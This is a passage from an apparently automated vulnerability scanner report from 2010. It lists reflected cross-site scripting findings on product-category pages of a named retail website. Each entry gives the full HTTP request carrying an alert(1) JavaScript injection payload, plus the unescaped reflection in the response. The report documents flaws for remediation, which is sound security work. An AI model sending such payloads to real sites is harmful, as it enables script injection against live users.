The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2b99"-alert(1)-"b505e6d38e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/knitwear/?e2b99"-alert(1)-"b505e6d38e3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hq2hfb1u0vk5sq9um71vvc1je1; expires=Tue, 09-Nov-2010 17:00:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Knitwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/knitwear/?e2b99"-alert(1)-"b505e6d38e3=1");
//]]>
...[SNIP]...

1.214. http://www.fredperry.com/men/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d63e5"-alert(1)-"f5e78f500b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mend63e5"-alert(1)-"f5e78f500b1/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=smj18gun57kdkd0467j6k2ble0; expires=Tue, 09-Nov-2010 17:01:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/mend63e5"-alert(1)-"f5e78f500b1/shirts/");
//]]>
...[SNIP]...

1.215. http://www.fredperry.com/men/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c7c4"-alert(1)-"ab334987f53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/shirts1c7c4"-alert(1)-"ab334987f53/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q7shd2ampm5hb37fpk1t5lpef0; expires=Tue, 09-Nov-2010 17:01:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/shirts1c7c4"-alert(1)-"ab334987f53/");
//]]>
...[SNIP]...

1.216. http://www.fredperry.com/men/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89931"-alert(1)-"4ce4c5dd22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/shirts/?89931"-alert(1)-"4ce4c5dd22=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r9bl983eqckpoi5qide0uqtdk7; expires=Tue, 09-Nov-2010 17:00:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/shirts/?89931"-alert(1)-"4ce4c5dd22=1");
//]]>
...[SNIP]...

1.217. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f6f"-alert(1)-"8259a03e431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men98f6f"-alert(1)-"8259a03e431/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cpnpt2cakueaginagvi7a3ccr3; expires=Tue, 09-Nov-2010 17:02:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men98f6f"-alert(1)-"8259a03e431/t-shirts/");
//]]>
...[SNIP]...

1.218. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee9e"-alert(1)-"5e40d014b78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/t-shirts9ee9e"-alert(1)-"5e40d014b78/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s9pds8t8hgp1kss83ab38dr1n7; expires=Tue, 09-Nov-2010 17:02:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/t-shirts9ee9e"-alert(1)-"5e40d014b78/");
//]]>
...[SNIP]...

1.219. http://www.fredperry.com/men/t-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7b5e"-alert(1)-"444542d087e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/t-shirts/?a7b5e"-alert(1)-"444542d087e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8julcge7l3eu86jt983j9j80i2; expires=Tue, 09-Nov-2010 17:00:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/t-shirts/?a7b5e"-alert(1)-"444542d087e=1");
//]]>
...[SNIP]...

1.220. http://www.fredperry.com/men/tennis/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b32d8"-alert(1)-"8e055ac8dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /menb32d8"-alert(1)-"8e055ac8dec/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f0fa2f8e8h2rpes2q3rqh16836; expires=Tue, 09-Nov-2010 16:59:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/menb32d8"-alert(1)-"8e055ac8dec/tennis/");
//]]>
...[SNIP]...

1.221. http://www.fredperry.com/men/tennis/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9404e"-alert(1)-"ba168a9b142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/tennis9404e"-alert(1)-"ba168a9b142/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ijktja01c1msmhc06ponorhte7; expires=Tue, 09-Nov-2010 16:59:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/tennis9404e"-alert(1)-"ba168a9b142/");
//]]>
...[SNIP]...

1.222. http://www.fredperry.com/men/tennis/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3032"-alert(1)-"08334eb7cc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/tennis/?b3032"-alert(1)-"08334eb7cc3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ahniq827j27m6f4gaeuunsfdo4; expires=Tue, 09-Nov-2010 16:58:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/tennis/?b3032"-alert(1)-"08334eb7cc3=1");
//]]>
...[SNIP]...

1.223. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b540b"-alert(1)-"d6d90d603e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /menb540b"-alert(1)-"d6d90d603e1/track-jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2lp41odj8d5fkstds9t06rrt80; expires=Tue, 09-Nov-2010 17:01:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/menb540b"-alert(1)-"d6d90d603e1/track-jackets/");
//]]>
...[SNIP]...

1.224. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f64a"-alert(1)-"cbf3aada87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/track-jackets9f64a"-alert(1)-"cbf3aada87/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k8brnmco109mo4fdmvep7dio44; expires=Tue, 09-Nov-2010 17:02:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/track-jackets9f64a"-alert(1)-"cbf3aada87/");
//]]>
...[SNIP]...

1.225. http://www.fredperry.com/men/track-jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e0d1"-alert(1)-"d9c3a859d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/track-jackets/?3e0d1"-alert(1)-"d9c3a859d62=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rurooq2eta8jp8rpvoms7jg661; expires=Tue, 09-Nov-2010 17:00:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Track J
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/track-jackets/?3e0d1"-alert(1)-"d9c3a859d62=1");
//]]>
...[SNIP]...

1.226. http://www.fredperry.com/men/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32758"-alert(1)-"88339fcc816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men32758"-alert(1)-"88339fcc816/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=agnd4mrumvubq89l712rq44e55; expires=Tue, 09-Nov-2010 17:01:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
